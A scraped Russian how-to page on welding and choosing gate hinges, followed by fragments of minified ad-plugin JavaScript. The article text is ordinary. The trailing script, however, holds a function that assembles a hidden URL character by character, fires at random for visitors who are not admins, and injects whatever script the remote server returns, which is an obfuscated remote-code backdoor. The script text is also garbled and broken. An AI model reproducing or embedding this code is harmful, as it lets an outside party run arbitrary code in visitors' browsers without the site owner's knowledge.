Разобраться со сварочным аппаратом «с наскока» не получится, поэтому лучше это сделать профессионалу. Если же у вас было несколько положительных опытов сварки, тогда вам легко удастся приварить петли на ворота. Для этого существует 2 способа:

  1. Сначала приваривается навес к створке. Потом вторую часть петли приваривают к столбу. Все должно быть строго вымерено, чтобы конструкция идеально сошлась и ворота спокойно открывались и закрывались.
  2. Приваривается навес к створке и устанавливается в зоне проема. Чтобы приподнять конструкцию используются деревянные бруски. Отмечается место для сварки второй части петель. После установки конструкции делается проверка плавности открытия и закрытия створок.

Рекомендации и советы для сварки петель на ворота

Чтобы ворота всегда открывались без труда, металл не повело и створки плотно закрывались, следуйте таким советам опытных сварщиков:

  • прямые петли удобней приваривать в горизонтальном положении. Например, на земле;
  • перед сваркой установите подложку под нижнюю часть створки. Она должна быть где-то в половину длинны петли, верхнюю часть створки придерживайте с торца рукой;
  • для равномерного распределения нагрузки к петлям можно приварить дополнительные пластинки из металла — монтажные;
  • если опорные столбы круглые, то необходимо будет сделать выпуск в 5 мм наружу. С прямоугольными столбами делается фиксация в уровень с торцевой стороной опоры;
  • приваривать лучше малыми прихватами, по два раза с каждой из сторон по очереди;
  • когда петли еще не закреплены, приложите вдоль них прямоугольный брусок, чтобы выставить их четко и правильно;
  • перед завершением сварки (привариванием петель изнутри), необходимо проверить плавность хода створок. Если чувствуете рывки, сделайте дополнительно несколько сварочных прихваток с наружной стороны;
  • перед окончательной приваркой петель изнутри, тщательно закройте обе створки ворот и сделайте в середине под ними подложку, чтобы не допустить провисания и неправильной сварки;
  • сварочный шов делается снизу вверх;
  • не открывайте ворота до тех пор, пока сварочные швы не остынут окончательно.

Особенности приваривания петель к воротам из профнастила

Профилированный лист часто используется в качестве материала для заборов и ворот. Что нужно учитывать, если вам нужно приварить петли к такому материалу и как это сделать?

  1. Сделайте перемычки, которые будут идти параллельно вертикальной стороны створки.
  2. Зафиксируйте перемычки в местах привариваривания петель. Они должны разделить створку на 3 равных части.
  3. К перемычкам с помощью сварочного аппарата привариваются петли.
  4. Чтобы скрыть место сварки и перемычки, прикрутите поверх небольшие кусочки профнастила.

Сварка без неприятных последствий

Чтобы приваривание петель к воротам прошло удачно, соблюдайте следующие рекомендации:

  • не работайте с неисправным сварочным аппаратом;
  • варить можно только после окончательного высыхания краски;
  • одежда не должна быть со следами жира, бензина, масла или любых других горючих жидкостей;
  • нельзя варить детали, находящиеся под давлением;
  • на баллон для сварочного аппарата нельзя вешать пропитанную горючими жидкостями ветошь. Часто подобное становилось причиной возгорания.

Петли на ворота из дерева — видео

Выбираем петли для ворот

Домовладение, огороженное забором, гараж, хозяйственные постройки и многие другие сооружения немыслимы без ворот. Несмотря на появившиеся в последние годы новые технологии, добрая старая классика – одно — или двустворчатые ворота, остаются самой востребованной, как у частных владельцев, так и на промышленных предприятиях и в коммерческих организациях. Такая популярность распашной конструкции имеет очевидное объяснение — она дешева, невероятно проста, надежна, долговечна и ремонтнопригодна в домашних условиях даже не особо мастеровитому человеку.

Выбор петель для ворот — это очень ответственное мероприятие.

И действительно, что может быть проще — одна или две створки, навешенные на петли, закрепленные на вертикальных опорах. И всего только один, правда, существенный недостаток. Для их открывания и закрывания необходимо пространство, часть окружности, радиус которой равен, как минимум, длине створки. Также на них сложно установить электрический привод, чтобы автоматизировать манипуляции, и, как следствие, невозможность применения модного нынче дистанционного управления.

Если требования, предъявляемые к полотну, определяются в основном вкусом владельца и вопросом функционального назначения ворот, то выбор петель является делом первостепенной важности вне зависимости от того, какие створки и какие опоры они будут соединять. Именно петли принимают на себя всю массу конструкции и являются единственным поворотно-крепежным узлом, обеспечивающим бесперебойность и плавность хода.

Особенности петель на ворота

Выбор петель определяется в каждом случае индивидуально для к онкретных створок и опор, они должны соответствовать следующим основным критериям:

  • максимально допустимая нагрузка на петли должна, как минимум, на 30% превышать нагрузку, создаваемую совокупным весом ворот;
  • максимально возможный угол открывания должен соответствовать требуемому углу раскрывания;
  • петли должн ы быть изготовлен ы из качественной стали;
  • предусмотренный конструкцией способ крепления должен быть технологически применим к конкретным опорам;
  • при предъявлении повышенных требований к плавности и легкости открывания и закрывания необходимы петли, укомплектованные подшипниками качения.

Достоверная информация по всем перечисленным выше пунктам может быть получена на официальном сайте производителя, либо в организациях, профессионально занимающихся установкой ограждений и заборов.

Разновидности

Воротная петля представля е т собой конструкцию, состоящую из двух и более комплектующих, соединенных в единый механизм, являющийся шарниром, движущимся в плоскости, перпендикулярной оси вращения. Угол раскрытия петли находится в диапазоне от 180 до 90 градусов. Выпускаются одно, двух и трех секционные петли с различными способами крепления, как к о створкам ворот, так и к опорам.

В настоящее время на рынке представлены петли для ворот следующих основных видов:

  • Шарнирная — между валом и опорной частью механизма установлен металлический шарик, улучшающий плавность хода.
  • Цилиндрическая — на штырь петли установлен опорный подшипник, принимающий на себя всю массу створки ворот. Такая петля обеспечивает наиболее легкий и плавный ход воротам. Однако цилиндрические петли применимы к о створкам относительно небольшой массы — до 500 килограмм.
  • Усиленная цилиндрическая петля — в ней также применяется подшипник, но за счет внесенных в конструкцию корпуса петли изменений максимальная прилагаемая нагрузка увеличена до 650 килограмм.
  • Сквозная получила свое название благодаря стержню, проходящему между левой и правой сегментами петли. Конструкция сквозной петли предусматривает возможность ее установки в тех случаях, когда другие способы крепления, винтовой монтаж или сварка, по каким-либо причинам неприемлемы. Из всех видов воротных петель сквозная наименее грузоподъемная. На нее допускается навешивать створку массой не более 190 килограмм.
  • Кованая отличается от перечисленных выше видов петель только способом изготовления — она в буквальном смысле выковывается вручную. Предназначена преимущественно для удержания деревянных створок, но может применяться и на металлических воротах. Основная сфера применения — воплощение в жизнь замысла дизайнера по стилевому решению домовладения в целом или ворот и ограды, в частности.
  • Стреловидная петля применяется исключительно на деревянных створках и служит для придания им дополнительной прочности.
  • Потайная петля скрыта от посторонних глаз. У станавливается заподлицо в створке ворот, а другой своей частью крепится к опоре изнутри.
  • Накладная — самый распространенный вид петли для гаражных ворот. Петля состоит из трех секций и способна удерживать створки ворот большой массы. Применяется на всех видах ворот и калиток. Конструкция такой петли исключает провисания створок и скрипы при открывании или закрывании ворот. Также невозможно снять створки с таких петель, предварительно не демонтировав сами петли с опор.

Шарнирные петли для ворот

Шарнирные петли для ворот — наиболее распространенный вариант.

Широкая распространенность шарнирных петель у частных застройщиков обусловлена их несомненными достоинствами, число которых существенно превышает недостатки и во многом перекрывает их.

Основные преимущества шарнирных петель:

  1. высокая износоустойчивость;
  2. способность удерживать створки значительной массы, сохраняя при этом легкость и плавность хода ворот при их открывании и закрывании;
  3. удовлетворительные антивандальные характеристики;
  4. возможность применения в рамочных конструкциях ворот, полотно которых изготовлено из профнастила ;
  5. правильный монтаж ворот с шарнирными петлями на опорных стойках исключает самопроизвольное движение.

В качестве шарнира, как правило, применяется шарик от шарикоподшипника определенного диаметра. Для тяжелых ворот применяют массивные петли с опорным шариком большого диаметра. Высокое качество стали шариков обуславливает длительный срок службы и высокие эксплуатационные характеристики.

Скрытые

Наиболее красивый вариант петель.

Т акие петли еще называют потайными. Они применяются в конструкциях, в которых, по замыслу дизайнера, не должны быть видны петли. Поэтому петля прячется в рамку створки, а к опоре другая ее сторона крепится только своей внутренней частью.

К сожалению, скрытые петли имеют наименьшее сопротивление к внешнему воздействию. Способ их крепления не является достаточно надежным против действий вандалов. Петля может быть сбита сильным ударом в месте ее крепления к створке. Между тем, ввиду ограниченности доступа, шансы быть срезанной обычным инструментом, ножовкой или болгаркой, стремятся к нулю. В целом, внешне ворота с такими петлями смотрятся привлекательно и предоставляют дизайнерской мысли широкое поле для деятельности.

Декоративные

Название говорит само за себя, функционала в них мало, зато красиво.

Петли, изготовленные способом ковки, относятся к декоративным. Из-за причудливости форм такие петли еще называют «коваными жиковинами «. Применяются в случаях, когда ворота выполнены в определенном стиле, например, под старину с элементами ковки, и навесы должны внешне ему соответствовать.

Несмотря на свой затейливый внешний вид, декоративные кованые петли характеризуются высокой прочностью и длительным сроком службы. Конструктивно они могут быть как с шариком в качестве опоры, так и с шарикоподшипниками. Их единственный недостаток — это высокая цена, определяемая ручным способом изготовления, часто по индивидуальному художественному эскизу.

Каплевидные

Э ти петли названы так из-за своей характерной каплевидной формы. Конструктивно каплевидные петли — это те же цилиндрические петли с опорным подшипником внутри, но с видоизмененной формой. Каплевидность не только украшает петлю, но и создает комфортные условия при ее монтаже на опорные стойки. Сварочный шов получается равномерный и с повышенной прочностью.

Регулируемые

Регулируемые петли незаменимы в тех случаях, когда ворота установлены на опорные столбы, укрепленные в грунте, который имеет свойство существенно увеличиваться в объеме под воздействием отрицательных температур. Имеющаяся в регулируемых петлях возможность настройки предотвращает их поломку холодной зимой, когда грунт пучинится , и через опоры на оси петель передаются дополнительные нагрузки, которые при определенных условиях могут стать запредельными. Разумеется, весной настройки необходимо вернуть в прежнее положение.

Цилиндрические

Петли цилиндрической формы, конструктивно выполненные из 2 частей. Штырь одной части входит в отверстие другой части с установленным в ней подшипником. В корпусе со стороны подшипника устанавливается специальный клапан, через который подшипник периодически смазывается. Эти петли обеспечивают легкое и плавное движение при их открывании и закрывании. Увы, для цилиндрических петель существуют ограничения по прилагаемой к ним нагрузке. Они способны удерживать ворота массой менее 390 килограмм.

Часто на одну створку устанавливают не две цилиндрические петли, а четыре. Такой способ не увеличивает «грузоподъемность» конструкции, но существенно повышает беспрепятственность ее движения.

Как выбрать петли для ворот и калиток

П ри выборе следует руководствоваться следующими критериями:

  • материал, из которого изготовлены створки;
  • совокупная масса ворот;
  • ширина створки;
  • способ крепления петли;
  • угол, на который должна раскрываться каждая створка;
  • материал, из которого изготовлены опорные стойки;
  • стилевое или дизайнерское решение внешнего вида ворот или калитки.

Изложенная выше информация поможет разобраться со всеми перечисленными критериями и сделать правильный и взвешенный выбор петель. Декоративные функции являются вопросом второстепенной важности. Не следует игнорировать общее правило — в первую очередь петли должны соответствовать своим эксплуатационным характеристикам и уже потом ублажать своим внешним видом взгляд и тщеславие владельца ворот.

Кроме банальной рекомендации о целесообразности приобретения петель только от известн ых производителей, будет не лишним при самостоятельной покупке петель, зная массу ворот, уточнить у продавца соответствие выбранной модели той нагрузке, которую она должна будет нести в процессе эксплуатации.

Монтаж петель на створках и опорах

Масса ворот и материал, из которого изготовлены створки и опорные стойки, определяют способ их крепления. На легкие конструкции из дерева петли, как правило, навешиваются с помощью саморезов . Петля фиксируется на фасадной части створки саморезами по дереву соответствующего размера. Далее створка прислоняется к установленной строго вертикально опоре в свое штатное положение. На ней отмечаются места крепления второго сегмента, после чего петля закрепляется на опоре такими же саморезами по дереву.

Приварка петель — процесс достаточно сложный, который лучше доверить профи.

Следует отметить, что крепить петли саморезами можно не только к створкам, выполненным из дерева, но и также и из бетона или к легким рамочным конструкции с полотном из профнастила .

Для массивных ворот, изготовленных из металла, приемлем единственный способ крепежа посредством электрической или газовой сварки. Если установить петли на саморезы под силу даже неопытному человеку, то сварочные работы следует производить только при наличии соответствующего навыка. В противном случае , целесообразно обратиться к профессиональным сварщикам.

Как правильно приварить петли на воротах

Первоначально петли следует приварить к створке. На земле необходимо выбрать ровный горизонтальный участок и уложить на него створку. Под каждую петлю устанавливается подложка толщиной менее четырех миллиметров. Подложка подкладывается под ее нижнюю часть, а верхняя часть прихватывается сваркой. Далее прихваченные петли необходимо выровнять специальным бруском и приварить окончательно.

Сварка петли к опоре производится с ее внутренней стороны. Она прихватывается в нескольких местах, после чего проверяется легкость и плавность хода створки при ее открывании и закрывании. Окончательная сварка производится при закрытой створке. Под противоположный от опоры угол створки устанавливается подставка, удерживающая ворота в штатном положении.

Сварочный шов выполняется с каждой стороны петли и только в единственном направлении — с нижнего положения в верхнее . Ворота нельзя открывать до полного остывания мест сварки.

Что делать, если петли заржавели

П од воздействием погодных факторов петли редко открываемых ворот могут заржаветь. Также коррозии могут быть подвер жена конструкция, в которой отсутствует смазка. В большинстве случаев снять створки с петель является трудно разрешимой или вообще не выполним ой без демонтажа створки с опор задачей.
Чтобы избавиться от коррозии , не снимая створки, необходимо приобрести в строительном магазине любой очиститель от ржавчины и обильно полить им каждую петлю. С помощью шприца с набранным в него очистителем следует закачать смывающий состав внутрь механизма, после чего несколько раз произвести открывание и закрывание. Подождать 10-15 минут до завершения химической реакции и затем смыть очиститель ржавчины Уайт-спиритом . Очищенную таким способом петлю необходимо смазать любым машинным маслом, добившись, чтобы ее внутренняя часть была полностью заполнена маслом.

В дальнейшем с целью профилактики рекомендуется периодически смазывать петли изнутри и снаружи. Это обеспечит легкость и плавность хода створок и продлит срок их службы.

Вам точно будут интересны эти статьи:

К данной статье еще нет комментариев. Оставьте первый комментарий!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика